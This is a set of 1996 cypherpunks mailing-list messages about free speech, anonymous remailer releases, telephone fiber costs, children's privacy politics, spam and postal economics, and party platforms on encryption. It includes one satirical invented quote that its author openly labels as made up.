> > Just talk about secession of a state in the U.S., and you'll quickly see wh
> > ich
> > country makes political ideas illegal.
>
> OK, so what would happen if I organized a party with the proclaimed goal
> of secession of Oklahoma from the United States?

You'd make The Right Reverend Colin James III very happy because you'd
be deported back to Sovok. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Thu, 22 Aug 1996 17:46:23 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <ae40eda80f0210043236@[205.199.118.202]>
Message-ID: <Pine.GUL.3.95.960821222559.21597D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Timothy C. May wrote:

> At 6:47 PM 8/21/96, Brian Davis wrote:
> >On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
> >
> >> Rush Limbaugh reports:
     ^^^^^^^^^^^^^^^^^^^^^
[...]
> Well, I agree that saying "I hope you die" is a tad bit more serious than
> "You suck, and those boys died."
> 
> If these additional words were spoken, why didn't the SS reveal them early
> on? (Or, if they did, why did the news reports not mention them?)

"News Reports"? Jesus.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Thu, 22 Aug 1996 13:07:23 +0800
To: cypherpunks@toad.com
Subject: WinSock Remailer Available at Obscura
Message-ID: <199608220228.WAA07722@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

The WinSock Remailer is now available for download 
from Lance Cottrell's homepage at:

  http://www.obscura.com/~loki/

Go to the export controlled section.  After you
traverse the export control form and get to the 
ftp site, you will find the remailer in the DOS 
directory.  The filename is WSA12.ZIP.  Inside you
will find a README.TXT file (that contains information
on how to setup the remailer), a PGP signature file
WSRMA12.SIG, and the remailer binaries WSRMA12.ZIP.
The signature file is used with PGP to check that the
the WSRMA12.ZIP file has not been altered.

Send me a note if you have any difficulty.  A special
thanks to Lance for his help and his disk space.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Thu, 22 Aug 1996 13:20:38 +0800
To: cypherpunks@toad.com
Subject: Re: telco's vs x-phones
Message-ID: <1.5.4.32.19960822023217.00729710@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



I think you both have good points here.  I will redo the math.

At 09:19 AM 8/21/96 -0700,  Brian D Williams <talon57@well.com> wrote:
>In a reply to Vipul Ved Prakash, Jim Bell wrote:
>Siecore plain vanilla 36 fiber singlemode list $ 1.82 a foot, $5.46
>a yard.  

Jim said $10/meter, so about 50% of his estimate.


>
>>Each fiber pair should be able to handle approximately 1 million
>>conversations at current data rates, or a total of 18 million
>>conversations for that 18-pair cable, or 9.5 trillion 
>>conversation-minutes.
>
>At current data rates (OC-48 Sonet) 32,256 voice channels per
>fiber, 580,608 total for the fiber.

Ok.. I think we're talking apples and oranges.  Jim uses the term conversation,
which I assume is a 3 minute duration of time.  Your OC-48 handles almost
precisely 1 million conversations per day.   (32k DS0 x 24 * 60 * 20)

So I can see where he could come up with 18 million conversations.  I
have no idea what a conversation-minute is.  Perhaps another measure
would be the total number of conversations per year.

18 million/day * 365 = 6.5 billion conversations per year.

So I believe he is off by a factor of 1000+ at this point, but then the
fiber is half the cost he thought it was, so its really only 500+.


>>Multiply this cost by 10 for right of way, trenching, repeaters,
>>and other auxiliary hardware, or $100 per meter.  This is probably
>>just a ballpark estimate, but...
>
>Off by a factor of at least 10 not counting switching equipment.

So, assume that he's a long haul carrier, and doesn't have to buy any
switching equipment.   Still, based on  $500/meter, that means 
that this network cost about 2.5 billion to build.

So if the system was running at full capacity, 24/7/365, the LD will have
to charge $0.50/conversation, or $0.15/minute to make 2.5 billion per year.

Even reaching 10% of that capacity is unlikely at $5/conversation.

Which, clearly, isn't happening.  I assume that either I have made a 
mistake in my calculations, or the costs of laying fiber has been 
grossly overestimated... Or, that since no-one is going around and buying
up 5000km right of ways, Sprint, MCI, AT&T and co. can lay fiber
much more cheaply.  If we assume $50/meter, it will cost 250 million, and they
will have to charge $0.015/minute to break even at 100% capacity, or 
$0.15/minute at 10% capacity - and we know Sprint charges less than that,
but if they can get more than 10% of the capacity --- although it is doubtful.

My best assumption at this point is that we don't have to make back the entire
cost of the fiber per year to make a profit.  if we only have to earn 20%
of its value to make a 10% profit, it would bring the price down to
$0.075/minute, and if we were to get OC-768 systems invented, we could reduce
that to $0.005/minute, which is approaching the values that Jim derived.

So, I hate to say it, but it looks like long distance is more expensive
than Jim (or I) thought.  But, in a few years (say, 5) it will approach
ridiculously cheap.  We can expect at that point that either
a) All (or most) long distance will be over the Internet
b) Internet phone will vanish as regular long distance becomes a flat fee
   like local service.

---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Prisoner <nul@void.gov>
Date: Thu, 22 Aug 1996 15:14:37 +0800
To: cypherpunks@toad.com
Subject: [noise]Re: The grey lady puts on some boots and rides a horseman or two...
In-Reply-To: <v03007800ae40c206aeb1@[206.119.69.46]>
Message-ID: <321BF202.3791@void.gov>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
> 
> I'm listening to the BBC's World Service at the moment, and they're doing a
> feature on pedophiles on the internet, complete with much knashing of teeth
> about encryption and anonymity, along with some lurid stuff about private
> holding cells, and sexual tourism, and slavery. And Lions. And Tigers. And
> Bears. Oh My.
> ... etc... 
> Be afraid, be very afraid. They're coming for your daughters. The BBC says so.
> 

What ******I'm******* afraid of is another Richard Davis coming after my daughters.

In case you don't know, he's the fuckhead who killed 12 yr old Polly Klaas 
after abducting her from her bedroom while her mother slept in the other room.

The man had been in and out of custody for years for violent crimes, and always seemed to get out.

Davis did not use encryption, a computer, the Internet, PGPPhone.  He used her panties.

Internet, encryption, anonymity: bullshit.  
Get the fucking child-murderers off the *streets*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Thu, 22 Aug 1996 13:36:43 +0800
To: cypherpunks@toad.com
Subject: WinSock Remailer Update
Message-ID: <199608220239.WAA69392@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

I've done some additional testing of the WinSock Remailer
with Windows 95.  In short, the remailer does not decrypt
messages properly in Windows 95.  Therefore, it should 
not be used with that operating system.  If you sent messages
this evening, then some or all of these may have been lost
during testing with Win95.

I suspect that the same problems would be present with
Windows NT, and indeed, one user reports a similar problem.

Don't expect a fix for 95 or NT soon, as I'm a relative
neophyte with these operating systems.  In fact, I just
installed Win95* yesterday.  So, please be patient.

I will have another alpha release of the remailer next
week.  Please stay tuned.

As always, my homepage is:

  http://www.c2.net/~winsock/

* What possessed M$ into turning Windows 95 into a Macintosh 
like interface, I'll never know... (Yes, I have been hiding
under a rock for the past two years, why do you ask?)

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 22 Aug 1996 18:10:28 +0800
To: cypherpunks@toad.com
Subject: Re: [noise]Re: The grey lady puts on some boots and rides a horseman or two...
In-Reply-To: <321BF202.3791@void.gov>
Message-ID: <199608220550.WAA17101@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone wrote:

> What ******I'm******* afraid of is another Richard Davis coming after
> my daughters.

> In case you don't know, he's the fuckhead who killed 12 yr old Polly
> Klaas after abducting her from her bedroom while her mother slept in
> the other room.

Oh, we know about it all right.  We've heard nothing else on the news
for months on end.  A little war of sound bytes to the exclusion of
the hundreds of other children who were killed by their own parents
during the time we were fed this one-in-a-million occurrence as some
sort of prototypical child danger. 

Someone in "another newsgroup" recently commented that by the end of 
the trial, he was ready to vote the death penalty for Polly's father,
if that was the only way to make the man shut up. :)

Despite such press antics, home is still the most dangerous place 
for a child, and the parents are the most likely perps if a child
comes to harm.  

Being kidnapped out of your bedroom by a stranger probably ranks
below random lightning strikes as something kids need to worry about. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 22 Aug 1996 13:33:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608212138.OAA07368@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960821225141.22767A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, jim bell wrote:

> At 02:47 PM 8/21/96 -0400, Brian Davis wrote:
> >On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
> >
> >> Rush Limbaugh reports:
> >> 
> >> That a husband and wife are being jailed for yelling to Clinton "You Suck".
> >> 
> >> The Secret Service states additional words (yet un-uttered to the rest of 
> us)
> >> were mentioned that they deemed threatening.
> >
> >
> >"I hope you die." 
> 
> Doesn't sound much like a "threat" to me.
> 
> > And the couple was arrestd for disorderly conduct by 
> >Chicago police. 
> 
> It sounds to me like the Chicops were just showing their "loyalty" by 
> sitting on somebody, not that they believed any real crime had been committed.

Nope.  When police started to ask the couple questions, they began 
screaming obscenities and generally causing a scene.  Chicago cops, being 
what they are, are likely to arrest someone in that circumstance without 
any prodding.  I'm not saying they should, but they will.
> 
> > Any possible federal charges for threatening a president 
> >in violation of 18 U.S.C. Section 871 await a determination of the 
> >seriousness of the statement, in context with the wife's conduct, by 
> >prosecutors.  I predict no action.
                 ^^^^^^^^^^^^^^^^^^^
> 
> But it isn't even a "threat", regardless of how "serious" it was.   The "I 
> hope you die"  part is, presumably, a statement of fact:  She did, indeed, 
> hope he dies.  But I don't see how hoping this can be considered a threat, 
> or even SAYING she's hoping this is, likewise.
 
The statement must be considered in context with their conduct, but as I 
said before, I predict no action.


> 
> Makes me wonder whether visiting one of these appearances with a "Clinton 
> Doll" and a bunch of pins, and visibly inserting those pins into the doll 
> (while uttering various strange incantations), would constitute a "threat."
> 
> Frankly, I'd rather have a president who didn't feel the need to be 
> protected by thugs.

That's because you like dead Presidents. 



> Jim Bell
> jimbell@pacifier.com
> 

BTW I read an account of the incident in the liberal Louisville Courier 
Journal.  I guess they messed up and reported the news despite their 
political leanings....

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 22 Aug 1996 14:22:31 +0800
To: cypherpunks@toad.com
Subject: Re: CS First Boston lawsuit
In-Reply-To: <ae3d43f90a021004dcf8@[205.199.118.202]>
Message-ID: <v03007800ae4058b9e5d1@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:29 AM 8/19/96, Alan Horowitz wrote:
>I suspect they are trying to get a judgement against "John Doe", in the
>hopes of tracking him down later.
>
>Actually, if I had a sizeable judgement against such a John Doe, I could
>probably find a private detective who would find the dude for a
>contingent fee. Wow, a whole new class of factoring (commerce definition)
>opens up. Get me a lawyer....


Since the messages were sent from an AoL account, I would assume that a
simple court order would be all that would be needed to force/require AoL
to release the billing-address records for the account. That would allow CS
First Boston to name the defendant. Refusal by AoL would just force CS
First Boston to add AoL as a co-defendant (until they supply the
name/info).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 22 Aug 1996 14:43:00 +0800
To: cypherpunks@toad.com
Subject: Today's Dilbert
Message-ID: <Pine.SUN.3.91.960822000727.14361A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I can't believe nobody mentioned wednesday's dilbert cartoon..

Simon
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nathan poznick <npoznick@Harding.edu>
Date: Thu, 22 Aug 1996 16:22:10 +0800
To: "John C. Randolph" <jcr@idiom.com>
Subject: Re: Husband/Wife jailed for saying Clinton SucksHusband/Wife jailedfor say
In-Reply-To: <199608220141.SAA05126@idiom.com>
Message-ID: <Pine.SOL.3.94.960822012737.28294B-100000@taz>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, John C. Randolph wrote:

> Well, wouldn't that require a president who had a clear conscience?
> I don't think we've had one of those since Eisenhower!

you think Eisenhower had a clear concience???
think of all the nuclear testing that went on during his time in office...

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^		             Nathan Poznick				 ^
^	        	 <npoznick@harding.edu>				 ^
^                    http://www.harding.edu/~npoznick			 ^
^									 ^
^                  "640k should be enough for anybody."			 ^
^									 ^
^		          --Bill Gates, 1981--				 ^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 22 Aug 1996 16:21:24 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Any CPs in D.C.?
In-Reply-To: <Pine.3.89.9608211445.A23772-0100000@netcom14>
Message-ID: <Pine.SUN.3.94.960822022123.26991A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Lucky Green wrote:

> I will be in D.C. through Saturday. I'd like to meet some Cypherpunks 
> that feel like getting to know what Lucky looks like :-)
> 
> If you are in D.C., give me a call at my hotel.
> (202) 682-0111 x440

Are you in D.C. now?

Perhaps a drink would be in order?

> 
> --Lucky
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 22 Aug 1996 18:35:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608220351.UAA01292@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960822040344.10490A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, jim bell wrote:

> At 10:55 PM 8/21/96 -0400, Brian Davis wrote:
> 
> >> 
> >> Makes me wonder whether visiting one of these appearances with a "Clinton 
> >> Doll" and a bunch of pins, and visibly inserting those pins into the doll 
> >> (while uttering various strange incantations), would constitute a "threat."
> >> 
> >> Frankly, I'd rather have a president who didn't feel the need to be 
> >> protected by thugs.
> >
> >That's because you like dead Presidents. 
> >
> 
> $50's and $100's are great!

You don't get them unless AP works.

EBD


> 
> (I also like old fat dead philosophers, as well.)
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Aug 1996 00:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: usenet not working with Agent now.
In-Reply-To: <199608220408.VAA02413@mail.pacifier.com>
Message-ID: <Ry92sD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> Agent keeps reporting bad server.

What's the cryptorelevance?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Aug 1996 00:06:29 +0800
To: cypherpunks@toad.com
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <199608220417.VAA06243@adnetsol.adnetsol.com>
Message-ID: <4Z92sD78w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:

> On Or About 21 Aug 96, 22:15, Dr.Dimitri Vulis KOTM wrote:
>
> > Alaska rightfully belongs to Russia, as do California and Hawaii.
> >
>
> No way.  We bought that stuff.  Then we spent the USSR into the dark
> ages, winning the Cold War.  Right?  Huh? What?

Wrong - it was a 99-year lease.

> Ross (Boy do I Hate Those Pesky Spammers) Wright

Protect free speech - support your local pesky spammer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 23 Aug 1996 02:25:00 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [noise]Re: The grey lady puts on some boots and rides a horseman or two...
In-Reply-To: <199608220550.WAA17101@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.960822073457.9687H-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Mike Duvos wrote:

> Someone wrote:
> 
> > What ******I'm******* afraid of is another Richard Davis coming after
> > my daughters.
> 
> > In case you don't know, he's the fuckhead who killed 12 yr old Polly
> > Klaas after abducting her from her bedroom while her mother slept in
> > the other room.
> 
> Oh, we know about it all right.  We've heard nothing else on the news
> for months on end.  A little war of sound bytes to the exclusion of
> the hundreds of other children who were killed by their own parents
> during the time we were fed this one-in-a-million occurrence as some
> sort of prototypical child danger. 
> 
> Someone in "another newsgroup" recently commented that by the end of 
> the trial, he was ready to vote the death penalty for Polly's father,
> if that was the only way to make the man shut up. :)

I met Polly's father at the "Kids off Lists" press conference in front of
the Capitol in June. He's an irascable fellow, and there's more to the
story than you might think at first. 

Check out part of Brock's Muckraker column I've attached below.

-Declan





// declan@eff.org // I do not represent the EFF // declan@well.com //

http://www.muckraker.com/muckraker/96/24/index3a.html

Muckraker
By Brock Meeks
June 12 1996


Teach Your Children Well, or Else ...

My kids are info subversives. I should know. I taught them everything I
know about the subject.

My kids know not to give out their telephone number or address to any
yahoo who asks for it on the street or phone. If pressed for such
information, they simply make up a number or address or zip code.

Those lessons have transferred to the online world, too. So when
prompted for personal information while netsurfing, my kids either jet
over to another site or simply fill in the blanks with bogus info.

My question is: What the hell are other parents doing? We live in an
information culture; no amount of bitching about how today's kids are
"smarter than we are" and none of the all-too-tired whining about how
"I have to ask my 10-year-old to program the VCR" will make this fact
any less true. Parents need to take more responsibility. The fight over
the Communications Decency Act raised the same point.

How best to protect kids from unrelenting Internet info scavengers is
now a topic of national debate, and the long arm of Congress and
regulatory agencies is reaching into the sandbox.

The issue ignited with an overheated report from the well-respected
Center for Media Education. These folks have done some great work in
the past, such as hammering the television networks for trying to pass
off Saturday morning cartoons as "educational programming." But when
they released their "Web of Deception" study, the group went over the
edge into Timothy Leary land - rest his soul.

That report overhyped a very real concern: Some companies use Web sites
as bait to entice kids to provide a wealth of information about
themselves, which can then be cranked into a database and crunched
every which way.

The report drove Representative Bob Franks (R-New Jersey) and Senator
Dianne Feinstein (D-California) to introduce the "Children's Privacy
Protection and Parental Empowerment Act." The idea is to keep kids'
names off direct marketing lists. It's a good concept, but it's short
on focus and long on fear - the fear that gathering such information
can lead to child abuse or worse.

A group called "Kids Off Lists" (KOL) was on hand during a PR event to
help juice the introduction of the bill. Heading that group is Marc
Klaas, whose claim to fame is that he's the father of Polly Klaas, the
12-year-old California girl who in 1994 was abducted from a slumber
party and murdered. Klaas's personal tragedy lends a twisted emotional
and impassioned draw to the issue.

During that event, a direct mail company called Metromail, a subsidiary
of the publishing giant R.R. Donnelley & Sons, was singled out as evil
incarnate for its practice of selling information on kids via a 900
telephone number. KOL showed off a flyer that offers US$5,000 for
information leading to the conviction of anyone who has used
information from such a company to "locate and harm a child."

But there's a subplot here. The actual driving force and financial
backer of KOL is John Phillips, who runs Aristotle Publishing, a
political software company in Washington, DC. Phillips, as it turns
out, has been in a kind of run-and-shoot legal battle with Donnelley
for the past five years, according to an article in the Washington City
Paper, an alternative weekly published in DC.

Phillips and Donnelley clashed over a soured deal involving Aristotle
and Metromail. Phillips sued for $5.3 million, and Metromail settled in
1995 for $2.7 million, according to the City Paper article. But
Phillips refused to let up and has funded KOL to keep the pressure on
Donnelley and Metromail. On 7 March, Donnelley said it would sell off
its majority holding in Metromail.

All this emotion spilled over and caught the attention of the Federal
Trade Commission. Jodie Bernstein, director of the agency's Bureau of
Consumer Protection, said that the "focus" of its two-day hearing last
week was "children in cyberspace" with questions aimed at finding out
"what's happening" with information collection on kids in cyberspace.
"We are not looking to prosecute but to educate and report," he said.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 22 Aug 1996 23:48:59 +0800
To: cypherpunks@toad.com
Subject: Re: Any CPs in D.C.?
In-Reply-To: <Pine.SUN.3.94.960822022123.26991A-100000@polaris>
Message-ID: <s792sD80w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> Are you in D.C. now?
>
> Perhaps a drink would be in order?

I'll be at InfoWarCon in Arlington Sept 4-6.

Any Usenet Cabal affiliates want to be spat on in person? :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Aug 1996 22:52:48 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <199608220141.SAA05126@idiom.com>
Message-ID: <v0300780bae41f8c1831d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 AM -0400 8/22/96, nathan poznick wrote:
> you think Eisenhower had a clear concience???
> think of all the nuclear testing that went on during his time in office...

... Which he did with a clear conscience.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Aug 1996 09:21:13 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming
Message-ID: <ae422c5c00021004e11a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:55 PM 8/22/96, Vipul Ved Prakash wrote:
>>
>
>    Internet pricing models are complicated and debatable, but you surely
>    end up paying for snail-junk-mail. Not directly, but hidden in the high
>    first-class mail costs. More mail, more infrastructure, higher costs.

Actually, precisely the opposite is true, according to a number of studies.
"Bulk mail" is a major profit center for the Postal Service, thus
subsidizing non-bulk /first class mail.

-- Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Aug 1996 09:54:34 +0800
To: cypherpunks@toad.com
Subject: Re: USPS
Message-ID: <ae422fd400021004704e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


You didn't quote the full thing:

At 5:14 PM 8/22/96, Bruce M. wrote:

>Web Week, July 8, 1996, p3

>    The Postal Service's attorneys have told the USPS that the tampering
>part of the current federal law would transfer to the electronic space,
>and that the mail fraud portion might also apply...
>
>    "We're a trusted third party," Saunders said.  "We don't have any
>interest in learning your trade secrets. However, we do have an interest
>in your reading habits, and we sometimes send, unsolicited, samples of
>child pornography to our customers, and then notify the proper authorities
>that one of our customers has taken the bait."

(Though I made up this last part, it represents reality. Postal inspectors
frequently collaborate with various national and international authorities
on matters involving pornography, fraud, pyramid schemes, and the sending
of various sorts of contraband. While FedEx, UPS, Airborne, etc., may
occasionally cooperate when a crime is called to their attention, I know of
no cases where Federal Express, for example, has become a willing and
leading partner in setting up stings. This is why the "Postal Service,"
despite nominal status as a a quasi-independent corporation, is actually
yet another enforcement arm of the government.)

The Postal Service probably has zero chance of getting into the e-mail
business in any fashion, much as they might want to. Businesses see too
many advantages in direct transmission, and are unlikely to hand the USPS
some money for the dubious benefit of slowing down the mail and (maybe)
adding some kind of signature. This is a case where businesses are fully
able to understand the role of independent encryption, signatures,
credentialling agencies, etc.

"Postal anarchy" is already the accepted norm for e-mail.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Fri, 23 Aug 1996 05:16:07 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Canada Imprisons People For Human Rights Activity
Message-ID: <9608221725.AA02571@elgreco.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain


>OK, so what would happen if I organized a party with the proclaimed goal
>of secession of Oklahoma from the United States?

You'd be overwhelmed with contributions?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 23 Aug 1996 02:58:28 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Republican and Democratic party platforms on technology
Message-ID: <v01510103ae4232dcce6d@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Dole's cosponsorship of Pro-CODE was a way to land some California votes
and a way to differentiate himself from Clinton, nothing more.

A statement he released on May 2 bashed the White House: "The
administration apparently thinks very little of the right to privacy -- it
presumes the government is entitled to all the so-called 'keys'  or secret
passwords which protect computer generate [sic] information from prying
yes..."

I predict that if he were to win, we'd see the fastest policy turnaround
ever. The moment he was inaugurated, Dole would pick up where Clinton left
off. Clipper IV, here we come...

But the benefit of having a pro-privacy statement in the platform (which in
fact was watered down significantly from that originally proposed by
advocates on our side) is that the platform covers Republican Party
candidates for any office, not just the presidency.

I'm told that the a Dem convention speaker may talk about privacy issues,
however.

-Declan



Tim writes, quoting me:

>Sure, the rhetoric might be slightly different under a Dole presidency. The
>focus would be on "halting the spread of abortion information on the Net"
>and "plotting by Communists using unbreakable cryptography."
>
>>(Contrast both parties with the Libertarians, which have a sterling
>>commitment to online civil liberties, reflected in the platform approved at
>>their convention last month.)
>
>I certainly plan to vote for Harry Browne, their candidate, even if voting
>only encourages the process.
>
>I first read Browne's stuff back in 1973, and, a few years later, his
>wonderful and "Zen Calvinist" (my term) book, "How I Found Freedom in an
>Unfree World," which I still recommend to people. As far as I'm concerned,
>Browne is the strongest candidate ever fielded by the Libertarian Party.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 23 Aug 1996 02:30:35 +0800
To: cypherpunks@toad.com
Subject: Asia seen having appetite for Internet banking
Message-ID: <2.2.32.19960822150701.0074c1b8@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


		 
>	 NEW DELHI, Aug 21 (Reuter) - Asian nations are eager to make  
>use of the Internet in the field of banking and finance to meet 
>individual country's needs, a senior official of computer group 
>Hewlett-Packard Co said on Wednesday. 
>	 ``The response through the region is quite phenomenal,'' Jeff  
>Ayton, the region's director of marketing in the financial 
>services division of Hewlett-Packard, told Reuters in an 
>interview. 
>	 He said a Hewlett-Packard roadshow he held across the region  
>revealed a keen interest in the use of Internet in banking and 
>insurance. Internet experts say customers can use the network to 
>transact business and banks can improve communications and 
>customer service with its help. 
>	 ``I don't think any Asian country wants to be left behind,''  
>he said, but added that the exact level of sophistication in the 
>demand generated would depend on customer needs and 
>infrastructure facilities in each nation. 
>	 With even rural areas now linked via satellites, there is a  
>big potential for Internet-linked business in huge emerging 
>markets, he said. 
>	 ``Satellite technology is what will help in countries like  
>China and India,'' he said, referring to their own satellite 
>launch programmes. 
>	 Ayton said he had found interest in using the Internet in  
>banking in the Philippines, Hong Kong, Malaysia, Thailand, 
>Singapore, Taiwan and South Korea. 
>	 Hewlett-Packard officials say that countries like India  
>could leapfrog in computer networking technology because they 
